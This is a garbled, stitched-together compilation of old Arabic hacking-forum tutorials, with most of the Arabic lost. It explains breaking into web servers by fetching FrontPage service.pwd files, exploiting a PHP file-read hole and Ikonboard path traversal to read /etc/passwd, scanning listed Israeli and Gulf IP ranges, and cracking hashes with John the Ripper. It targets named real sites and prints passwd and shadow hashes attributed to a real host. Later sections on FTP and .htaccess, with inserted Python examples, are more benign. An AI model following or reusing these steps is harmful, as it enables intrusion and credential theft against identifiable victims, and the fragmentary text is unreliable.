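SAMPLE_IIS = b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nConnection: close\r\n\r\n"
SAMPLE_VTI_INF = ('<!-- FrontPage Configuration Information\n'
                  ' FPVersion="5.0.2.2510"\n FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"\n-->')

if __name__ == "__main__":
    print(fingerprint(SAMPLE_APACHE))
    print(fingerprint(SAMPLE_IIS))
    print(vti_inf_version(SAMPLE_VTI_INF))
```

A server can lie in Server: (or strip it), so treat the header as a hint and confirm with _vti_inf.html and the _vti_bin executables before drawing conclusions.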
@ :
_ vti_pvt :
) : PHP
(
* .
* PHP :
<?php
$file = $_GET['file'];           // taken from the query string without any check
$open = fopen($file, "r");
$get = fgets($open, filesize($file));
echo $get;
fclose($open);
?>
PHP
file
:
http://www.Victim.com/uploded_file...../../etc/passwd
uploded_file
.
" "
> <
> :<
//
NT - Unix
-1 frontpage
:
netcraft: http://www.netcraft.com/
shows mod_frontpage/x
(x = the version)
/_vti_inf.html
for http://www.almodammer.com/ :
http://www.almodammer.com/_vti_inf.html
Enter
Frontpage Configuration Information
/_vti_cnf
:
http://www.almodammer.com/_vti_cnf
source
vti_generator:Programe
Programe
------------------------------------------------- -2 frontpage
frontpage
http://www.almodammer.com/
FrontPage's _vti_pvt:
http://www.almodammer.com/_vti_pvt
:
=============
administrator.pwd
administrators.pwd
service.pwd
users.pwd
user.pwd
author.pwd
=============
Format: username:passwd
service.pwd holds user / password pairs, e.g.
operator:hi9LHn9wAMuKM
operator:        the user name
hi9LHn9wAMuKM:   the encrypted password
=)=( Crack Jack
=)=( John The Ripper
John The Ripper:
http://www.openwall.com/john
Unzip it into c:\ ; the program is in the RUN directory, and the hashes go in a text file (passwd.txt) there.
Start > Run > command, Enter (a DOS window):
c:\>cd john
c:\john>cd RUN
c:\john\RUN>
John The Ripper
====
john -i:All passwd.txt
------------------------- (incremental mode, all characters)
====
john -i:Alpha passwd.txt
--------------------------------- (letters only)
====
john -i:Digits passwd.txt
--------------------------------- (digits only)
====
john -single passwd.txt
-------------------------------- (single-crack mode)
-------------------------------------------------------------------------------
Cracked hashes are stored in john.pot; "john -show passwd.txt" prints them as username:password
-------------------------------------------------------------------------------
!!
/
)(1
frontpage
file
open web
)(2
FTP
FTP
ws-ftp
pro ftp
...
DOS
======================================
google
http://www.google.com/
/_vti_pvt
http://www.altavista.com/
link:service.pwd
..
link:administrators
password.
" "
><
> :<
Random Hacking CGIScripts Random Hacking
spiders
altavista.com ) link:xxxx.cgi or pl (
help.cgi link:help.cgi
Ikonboard HTML
help.cgi : http://www.example.com/cgi-bin/help.cgi
http://www.example.com/cgi-bin/help.cgi?helpon=../members/[member].cgi%00
] [member ][
Ikonboard
2.1.7
CGIScript url
Exploit
http://www.secure.f2s.com/eng_ver/bugs/
/http://www.securiteam.com
....
...
CGIScripts !!
(:
co.il - 12610 sites, org.il - 1104 sites, ac.il - 70 sites, gov.il - 78 sites,
net.il - 54 sites, muni.il - 29 sites, com - 2009 sites, net - 137 sites,
org - 121 sites, edu - 4 sites, israel.net - 84 sites, ........ .il sites
http://iguide.co.il/sites/sites.htm
/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
http://www.info.gov.il/find.pl
altavista.co.il
/w3-msql
Sent through proxy.isp.net.sa:8080 as a GET request:
GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il
Proxy-Connection: Keep-Alive
http://www.com.il/cgi-bin/
/cgi-bin/w3-msql
WWWMSQL
cgi-bin/w3-msql
WWWMSQL
w3-msql Exploit w3-msql
http://www.securiteam.com/exploits/2WUQBRFS3A.html
Random Hacking
w3-msql
/_vti_pvt/
HTML *html.
The page cannot be displayed..
Forbddien .... not found....
.. .....
url c
perl Shell *.sh Batch
perl exploit.pl exploit
(:
(:
> perl
perl exploit.pl > log.htm
Exploit
) ( RedHat 6.2
.
" "
><
>< marwan911 :
.
:IIS ) . (
:apache .
http://www.netcraft.net
whitehouse.org
enter the site with http:// :
http://uptime.netcraft.com/up/graph....whitehouse.org
The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000
IIS 5.0
Windows 2000
IIS5.0 ) (
) 2000 (
IIS .
.
.
www.arank.com
The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
apache 1.3.20 FrontPage/5.0.2.2510
Linux
.
_ vti_pvt _ private
" "
> <
>:
.
( -1
( - ) IIS (
( - ) apachc (
( -2
( -3
( -4
IIS
.
apachc
.
.
: , : spiders
, ,
, walla.co.il : ,
;( .
:10 , , !!
:10 , $:
, , ,(: (: (: service.pwd :
:11 , , (:
:11 , EXPLOITES
, , (: , EXPLOITES
. /http://www.ussrback.com :
1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox99/cgiscan3.zip
"
"
> <
> :<
:::
,,,
,,
...
::
27374 . 1243
**
.
------------
+
........ ,,,,
...
http://mypage.ayna.com/a7lla1/superscan.zip
(ranges, start - end:)
212.150.13.1 - 212.150.32.255
62.0.150.1 - 62.0.180.255
199.203.75.1 - 199.203.72.255
139.92.208.1 - 139.92.208.255
192.114.42.1 - 192.114.42.255
216.72.43.1 - 216.72.43.255
212.143.113.1 - 212.143.113.255
209.88.198.1 - 209.88.198.255
212.29.238.1 - 212.29.238.255
193.128.102.1 - 193.128.102.255
192.117.236.1 - 192.117.236.255
213.8.204.1 - 213.8.204.255
212.25.120.1 - 212.25.120.255
128.139.1.1 - 128.139.1.255
212.2.224.1 - 212.2.227.255
212.26.1.1 - 212.26.255.225
213.238.0.1 - 213.238.20.255
212.102.1.1 - 212.102.3.255
212.116.190.1 - 212.116.195.255
212.106.60.1 - 212.106.70.255
195.229.6.1 - 195.229.31.255
195.229.224.1 - 195.229.255.255
194.170.30.1 - 194.170.30.255
213.42.1.1 - 213.42.255.255
208.7.70.1 - 208.7.80.255
195.226.240.1 - 195.226.255.255
195.39.130.1 - 195.39.145.255
168.187.1.1 - 168.187.255.255
194.133.1.1 - 194.133.255.25
209.58.40.1 - 209.58.40.255
206.82.133.1 - 206.82.133.255
206.49.109.1 - 206.49.109.255
212.72.1.1 - 212.72.7.255
193.188.50.1 - 193.188.200.255
+++++++++++
[] ][1
[] ][2
========================================
*****& &*****
=)
Start
ShadowScanSecurity
(=
-1-
Scanner
-2-
=1 4 )
(
=2
=3 4
=4
=5
=6
=7
-3-
) (1 -2-
) (2
) (3
-4-
+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+
+ 7+
-5-
Done
-6-
Start Scan
1 -5-
" "
> <
> : <
/etc/shadow
BSD:
/etc/master.passwd
SGI IRIX:
/etc/shadow
AIX:
/etc/security/passwd
(( 64-bit systems ))
/etc/shadow
(( the hashes may be MD5 ))
Windows NT - 2000 - XP:
(( LanMan hashes ))
\winnt\system32\config\sam
(( the file is locked while Windows runs; the backup copy: ))
\winnt\repair\sam._ or sam
(( - ))
(the directory is WINNT on NT/2000 and Windows on XP)
" ) ( "
> <
:
..
..
..
Telnet ..
Telnet
Port )( )
(Daemon .
: )( )(
)( .. ) (Telnet
) (Daemon ..
.. ) ( ) ( .
Telnet ) ( ..
.
Daemon .
Telnet FTP Client
FileTransfer Protocol
.. 21
Telnet FTP Client
!! FTP
..
1- telnet ftp.zdnet.com 21
220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.
user anonymous
331 Guest login ok, send your complete e-mail address as password.
pass @zorro
(anonymous logins accept any e-mail address as the password; here just "@" and a name)
230-You are user #552 of 2000 simultaneous users allowed.
230-
230 Logged in anonymously.
..
To transfer data the server needs a second connection besides the control connection, and it needs to know which IP and port to use. Ask for one with PASV:
PASV
227 Entering Passive Mode (207,189,69,61,12,41)
The first four numbers are the server's IP (207.189.69.61); the port is 12 * 256 + 41 = 3113.
Open a second telnet to ftp.zdnet.com 3113, then on the control connection ask for the listing:
LIST
125 Data connection already open; Transfer starting.
.
.. PASV .
..
) ( .
.. CuteFTP!!
http://www.vbip.com/winsock/winsock_ftp_01.asp
(http://www.vbip.com/winsock/winsock_ftp_ref_01.htm)
(http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html - RFC 959, the FTP specification)
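The manual FTP dialogue above, as an added Python example (not code from the original page). parse_pasv() does the p1*256 + p2 arithmetic from the text, data_endpoint() applies the check real clients make on the advertised address, and FtpDriver replays USER/PASS/PASV/LIST against a scripted list of server replies so the whole thing runs offline. The host name and replies in REPLIES are constructed for the demo.

```python
"""Anonymous FTP over a raw control connection, with PASV handled by hand.

Added example (not from the original page).
"""
import ipaddress
import re

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(reply: str) -> tuple[str, int]:
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> ('h1.h2.h3.h4', p1*256+p2)."""
    if not reply.startswith("227"):
        raise ValueError(f"not a PASV reply: {reply!r}")
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError(f"malformed PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError("octet out of range")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def data_endpoint(control_host: str, reply: str) -> tuple[str, int]:
    """Where to open the data connection.

    A server behind NAT may advertise a private address, and a hostile server
    can advertise someone else's (the FTP bounce trick). Clients therefore
    ignore the advertised host, reuse the control-connection address and keep
    only the port.
    """
    advertised, port = parse_pasv(reply)
    if advertised != control_host or ipaddress.ip_address(advertised).is_private:
        return control_host, port
    return advertised, port


class FtpDriver:
    """Replays the Telnet dialogue; `replies` stands in for the server."""

    def __init__(self, replies):
        self._replies = list(replies)
        self.sent = []            # every command the client issued, in order

    def _exchange(self, cmd: str) -> str:
        self.sent.append(cmd)
        return self._replies.pop(0)

    def anonymous_login(self, email: str = "@zorro") -> bool:
        banner = self._replies.pop(0)
        if not banner.startswith("220"):
            return False
        if not self._exchange("USER anonymous").startswith("331"):
            return False
        return self._exchange(f"PASS {email}").startswith("230")

    def passive_list(self, control_host: str):
        """(host, port) to connect to for the listing, or None if LIST was refused."""
        endpoint = data_endpoint(control_host, self._exchange("PASV"))
        reply = self._exchange("LIST")
        return endpoint if reply[:3] in ("125", "150") else None


# Constructed transcript; the host name and address are not a real server.
REPLIES = [
    "220 l19-sj.example.net NcFTPd Server (licensed copy) ready.",
    "331 Guest login ok, send your complete e-mail address as password.",
    "230 Logged in anonymously.",
    "227 Entering Passive Mode (207,189,69,61,12,41)",
    "125 Data connection already open; Transfer starting.",
]


def demo_session(control_host: str = "207.189.69.61"):
    """Run the scripted dialogue; returns (logged_in, data_endpoint, commands_sent)."""
    ftp = FtpDriver(REPLIES)
    ok = ftp.anonymous_login()
    endpoint = ftp.passive_list(control_host) if ok else None
    return ok, endpoint, ftp.sent


if __name__ == "__main__":
    print(demo_session())
```

Multi-line replies (the 230- lines in the real transcript) are one logical reply ending at the line whose code is followed by a space; a real client has to read until that line before sending the next command.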
" ) ( "
> <
> :<
:
~~~~~~~~~
. password file password file ) (encryption ) (shadowed -
-:
~~~~~~~~~
!
) ( Void Eye
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
nmap
www.insecure.org/nmap
SuperScan
Perl Perl
C
( /http://www.7lem.com
ping (
(21 - 22 - 23 - 25 - 37 - 110 - 143 - 513 - 514 - 587)
...
telnet www.7lem.com 23
http://www.psyon.org/tools/index.html
whois
http://www.google.com/search?q=whois&btnG=Google+Search
~~~~~~~~~~~~~~~~~~~~~~~~~~
void eye ShadowSecurityScaner !!
Apache IIS CGI Perl PHP
..
counter
mp3 Don't Tell Me
25 23 21 110
Ikonboard v2.1.8b
Ikonboard v2.1.8b Ikonboard v2.1.7b
cgi pl
% 80 cgi
etc/passwd
FreeBSD
shadow master.passwd ..
...
++++++++++++++++++++++++
} { http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi CGI
....
: timduff.com
i'm from saudi arabia
/../../../../../../../../../../../../../../../../../
/../ !
-:
-1
-2
.....
-3 ) ( Perl - Cgi
-4 %100
) (
-5 )
(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/http://www.timduff.com
) (
)( sh
shell * sh.
shell
)(bat
)( C
gcc
gcc Exploit.c -o Exploit
) * c. * C. c
++ )* (h.
(
Perl
)
(
....
= Exploit
password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
-----------------------------------------------------------------------------------------------
10
......
~~~~~~~~~~~~~~~~~~~~~~~~~~
!...
x or * = shadowed (the hash is kept in the shadow file)
EpGw4GekZ1B9U = a DES crypt(3) hash, 13 characters
(FreeBSD keeps the hashes in /etc/master.passwd)
password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root       : the login name
x          : the password field (x = the hash is in the shadow file)
0          : the UID (0 = root privileges)
1          : the GID
Super-User : the comment (GECOS) field
/          : the home directory
/sbin/sh   : the login shell
++++++++++++++++++++++++++++
(encryption) (shadowed)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
When the password field holds only a token (x, *, # or !) the hash is not in the password file but in the shadow file:
root:x:0:1:Super-User:/:/sbin/sh
When it is not shadowed, the hash itself sits in the second field:
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
Q71KBZlvYSnVw is the encrypted password.
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john the ripper jack the ripper
Crack 5a john the
ripper john the ripper .....
-:
wordlist .
[Diagram: each word from the wordlist is encrypted with crypt() (for example song -> Q6LiJ6ct1oUBz) and compared with the hash from the password file (Q2wrtUo9LPq2R); a match reveals the password. Figures shown: 5000 (wordlist) and 700 (john the ripper).]
-----------------------------------------------------------------------------------------------
john the ripper
john -w:wordlist passwd
wordlist
passwd
-----------------------------------------------------------------------------------------------
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer
Loaded 1 password
***** DONE  w: *****  c/s: 6401  99%  t: 0:00:00:01  c: 6401  v: 0
E:\Desktop\junk\john the ripper>
-----------------------------------------------------------------------------------------------
the results are saved in john.pot
...
brute force
wordlist 3
.. wordlist
5000 wordlist brute
force
john the ripper brute force:
john -i passwd
passwd = the file holding the hashes
...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
The shadow file on each system, and the token it leaves in the password field:
Linux    : /etc/shadow                         token = *
SunOS    : /etc/shadow                         token = *
FreeBSD  : /etc/master.passwd or /etc/shadow   token = x
IRIX     : /etc/shadow                         token = x
AIX      : /etc/security/passwd                token = !
ConvexOS : /etc/shadow or /etc/shadpw          token = *
The token in the passwd file tells you which system it is: "!" means /etc/security/passwd (AIX).
)
(
shadow
-----------------------------------------------------------------------------------------------
root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
-----------------------------------------------------------------------------------------------
passwd file shadow passwd
...
http://wilsonweb2.hwwilson.com/etc/passwd
-----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------- x token
/etc/shadow
http://wilsonweb2.hwwilson.com/etc/shadow
-----------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976::::::
erl:0jE9Xem4aJYeI:10982::::::
landmark:0jCgWu6vl8g0s:11185::::::
----------------------------------------------------------------------------------------------- x
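The merge step the section describes (put the shadow hash back into the passwd line so john can read it), as an added example that is not code from the original page. It also skips accounts whose shadow field is a lock marker (NP, *LK*, *, !), so the cracker is not fed entries that can never match. The passwd/shadow samples below are constructed for the example; the hashes are not real.

```python
# Added example (not part of the original page): a minimal "unshadow" that
# merges /etc/passwd with /etc/shadow in the form John the Ripper expects,
# and skips accounts whose shadow field is a lock marker (NP, *LK*, *, !)
# so the cracker only spends time on real hashes. All sample data below is
# constructed; the hashes are not real.
from typing import Dict, List

PASSWD_SAMPLE = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
www:x:102:1001::/web:/bin/csh
sid:x:103:10::/export/home/sid:/bin/ksh
"""

SHADOW_SAMPLE = """\
root:AbCdEfGhIjKlM:10643::::::
daemon:NP:6445::::::
www:*LK*:::::::
sid:ZyXwVuTsRqPoN:10515::::::
"""

# Values that mean "no usable hash here" on the systems the page lists.
LOCK_MARKERS = {"", "NP", "*", "!", "!!", "x", "*LK*"}


def is_locked(hash_field: str) -> bool:
    """True if the field is a placeholder or a lock marker rather than a hash."""
    return hash_field in LOCK_MARKERS or hash_field.startswith(("*LK*", "!"))


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user -> hash field (second column) from shadow-style content."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text: str, shadow_text: str, skip_locked: bool = True) -> List[str]:
    """Replace the passwd placeholder (x, *, !) with the hash from shadow.

    Entries that are not seven colon-separated fields are dropped as malformed;
    with skip_locked the locked/placeholder accounts are dropped as well.
    """
    hashes = parse_shadow(shadow_text)
    merged: List[str] = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        fields[1] = hashes.get(fields[0], fields[1])
        if skip_locked and is_locked(fields[1]):
            continue
        merged.append(":".join(fields))
    return merged


if __name__ == "__main__":
    # Save the output to a file and run: john -w:wordlist merged.txt
    for entry in unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(entry)
```

On the sample data only root and sid survive: daemon carries NP and www is locked with *LK*, exactly the entries a cracker would otherwise waste time on.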
-:
...
-:
www.securiteam.com/exploits/archive.html
http://www.ussrback.com/
+
http://www.secureroot.com/
http://www.rootshell.com/
http://www.ussrback.com/
www.secureroot.com/category/exploits
www.hitboss.com/Hacking
www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
http://www.warez.com/
Hacking
((
http://www.neworder.box.sk/
Security Search Engine
http://www.bugs2k.com/
insecure
http://www.insecure.org/
<XMP></BODY></HTML/>
http://public.www.easynet.co.uk/cgi...ail/formmail.pl
" (" )
> <
...
..
.....
....
* ) (host
* ) (passwd
/etc/passwd
shadow passwd
nt admin.pwd
*
cgi-bin cgi
php.cgi
http://www.jewish.org/
http://www.jewish.org/ + cgi-bin + php.cgi
http://www.jewish.org/cgi-bin/php.cgi
scripts
http://www.jewish.org/scripts/php.cgi
scripts winnt
cgi-bin
" )( "
><
>< ICER :
: ...
)(
...
(:
nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
gcc )... (
nmap and netcat .
* :
-1 ..
.
-2 nmap
-3 NetCat
-4
...
....
* :
(a) Linux (http://www.slackware.com/)
(b) Nmap (http://www.insecure.org/)
(c) NetCat (http://www.l0pht.com/~weld/netcat/)
-:
-1 ) ( P:
-2 nmap :
(1) tar zxvf nmap.tar.gz
(2) cd nmap
(3) ./configure && make && make install
-3 ..
www.target.com
-4
nslookup www.target.com
196.1.2.3
-5 -:
"nmap -sS -O 196.1.2.3"
-:
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on www.target.com (196.1.2.3):
(The 1531 ports scanned but not shown below are in state: closed)
(:
...
FTP ..
daemon
-: FTP daemon
"telnet 196.1.2.3 21"
"ftp 196.1.2.3"
:
root@IcEr:~# ftp 196.1.2.3
Connected to 196.1.2.3.
220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.
Name (target:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@IcEr.pandora.net
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
..
..
..
..
.. .
><
>< BSD-r00t :
|
| *
|
| * htaccess.
|
| * htaccess.
|
| * error
| * | index
|
| * /
|
| *
|
| * .htpasswd
|
| * htaccess.
|
| * htaccess.
|
| *
|
| *
-------------------------------------------------*
----------- ,
.. htaccess. .
* htaccess.
---------------------- -1
-2 error
-3 index
-4/
-5 .. html , .asp.
-6
* htaccess.
-------------------------- " "Notepad
htacces. txt. ,
" - "htaccess. . -
* error
-----------------------
.
error -:
- error
-
- htaccess.
ErrorDocument error_num directory_file
error_num is the HTTP status code to catch and directory_file the document
to serve instead of the server's default error page.
For example, to serve /errors/nfound.html whenever a 404 occurs:
ErrorDocument 404 /errors/nfound.html
errors - :
----------------------
| 400 | Bad Syntax   |
| 401 | Unauthorized |
| 402 | Not Used     |
| 403 | Forbidden    |
| 404 | Not Found    |
----------------------
* index
----------------------------------------------
-:
- index " "
- htaccess. -:
Options -Indexes
* /
------------------------------------ htaccess.
..
- :
deny from ???.???.???.???
... .
-:
deny from all
-:
... allow from
...
*
------------------------------------ Redirection htaccess.
htaccess.
-:
Redirect /somewhere/???.??? http://www.site.com/newlocation
/somewhere/???.??? is the old path on this server;
http://www.site.com/newlocation is where the visitor is sent instead.
.
---------* .htpasswd
----------------------- , htaccess. .
htaccess
htpasswd -:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 .
o EncryptedPwd1 , EncryptedPwd2
http://www.euronet.nl/~arnow/htpasswd
http://www.e2.unet.com/htaccess/make.htm
For example, with username Security and password fu93hds3 at
http://www.euronet.nl/~arnow/htpasswd :
o username: Security
o password & re-enter password: fu93hds3
o calculate --> Security:893bNicBcwszw
htaccess. .
htaccess
.
* htaccess.
---------------------------
, .
htaccess.
.
--:
AuthUserFile /somewhere/.htpasswd
AuthName "Enter your user and password please"
Require valid-user
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
o /somewhere/.htpasswd is the full path of the .htpasswd file.
o "Enter your user and password please" is the text shown in the login prompt.
* htaccess.
---------------------------- ,
..
- :
<Files .htaccess>
order allow,deny
deny from all
</Files>
Anyone requesting the file afterwards gets a 403 error.
*
------------------------------ html. txt. .
-:
AddType text/plain html
-:
http://www.pharaonics.net/books/MIME.txt
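An added audit script for the directives covered in this section (it is not code from the original page). It parses an .htaccess and flags what a reviewer looks for first: an AuthUserFile that is relative or sits under the document root (and may therefore be downloadable), directory listings left on, no <Files .htaccess> self-protection, and a "require" wrapped in <Limit ...>, which leaves every HTTP method not listed unauthenticated. The sample files and the document root path are constructed; note that a stock httpd.conf already denies .ht* files, so the third check matters mostly on hosts that changed that default.

```python
# Added example (not code from the original page): audit the .htaccess
# directives discussed in this section. Sample configs and docroot are
# constructed for the example.
import re
from typing import List, Tuple

SAMPLE_HTACCESS = """\
AuthUserFile /somewhere/.htpasswd
AuthName "Enter your user and password please"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
Options -Indexes
ErrorDocument 404 /errors/nfound.html
<Files .htaccess>
order allow,deny
deny from all
</Files>
"""

WEAK_HTACCESS = """\
AuthUserFile .htpasswd
require valid-user
"""


def parse_directives(text: str) -> List[Tuple[str, str]]:
    """Return (directive, arguments) pairs, skipping comments and section tags."""
    out: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        out.append((parts[0].lower(), parts[1] if len(parts) > 1 else ""))
    return out


def audit_htaccess(text: str, docroot: str = "/home/site/www") -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    directives = parse_directives(text)
    names = {d for d, _ in directives}

    # 1. password files must be absolute and must not be served from the web root
    for d, arg in directives:
        if d in ("authuserfile", "authgroupfile"):
            if not arg.startswith("/"):
                findings.append(f"{d} uses a relative path: {arg}")
            elif arg.startswith(docroot.rstrip("/") + "/"):
                findings.append(f"{d} is under the document root: {arg}")

    # 2. directory listings: the page's "Options -Indexes"
    options = " ".join(arg for d, arg in directives if d == "options").lower()
    if "-indexes" not in options:
        findings.append("directory listing not disabled (add 'Options -Indexes')")

    # 3. the page's <Files .htaccess> deny block
    if not re.search(r"<Files\s+\.htaccess>.*?deny\s+from\s+all.*?</Files>",
                     text, re.I | re.S):
        findings.append("no <Files .htaccess> block denying access to the file itself")

    # 4. a require line without the auth directives it depends on
    if "require" in names and "authtype" not in names:
        findings.append("'require' present without AuthType/AuthUserFile")

    # 5. require inside <Limit GET POST>: any other method bypasses the login
    if re.search(r"<Limit\b[^>]*>[^<]*\brequire\b", text, re.I | re.S):
        findings.append("'require' is inside <Limit ...>: methods not listed stay open; "
                        "drop the <Limit> or use <LimitExcept>")
    return findings


if __name__ == "__main__":
    for name, cfg in (("sample", SAMPLE_HTACCESS), ("weak", WEAK_HTACCESS)):
        print(name, audit_htaccess(cfg) or ["ok"])
```

The page's own configuration passes every check except the last one: protecting only GET and POST is the classic .htaccess mistake, since Apache will happily serve the same resource for a method the <Limit> does not name.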
> <
> :<
FTP
FTP File Transfer Protocol
TCP/IP
FTP
Formats
,FTP .
:
:
Download:
from the Host to the Local machine.
Upload:
from the Local machine to the Host.
:
:Secure FTP
.
:Anonymous FTP
guest anonymous
.
:
:Public Domain
.
:Freeware
.
:Shareware
FTP :
ASCII:
(American Standard Code for Information Interchange)
7-bit characters, values 0 to 127; used for plain-text files.
Binary:
8-bit bytes, values 0 to 255; used for every file that is not plain text.
Unlike ASCII text, jpg and gif images are binary, as are:
- audio and video: bmp, avi, ram, mpg, mp3, wav
- programs, drivers, archives and encoded files: exe, com, bat, dll, drv, sys, bin, ovl, zip, mim, uue, xxe, b64, bhx, and MS Office documents.
.
: FTP
:
UNIX
UNIX:
ascii          : transfer mode for text (ASCII) files.
binary         : transfer mode for binary files.
status         : show the current settings, including the transfer mode (ASCII or Binary).
help           : list the commands the UNIX FTP server supports.
dir            : directory listing (long form).
ls             : directory listing (short form).
cd directory   : change to the named directory on the server.
get filename   : download one file.
mget filename  : download several files (wildcards allowed).
pwd            : print the current directory on the server.
bye            : close the session.
:Shell
Tripod Unix Shell ftp ftp :
ftp.tripod.com " "IronPrivate
"******" . Unix.
Unix
:
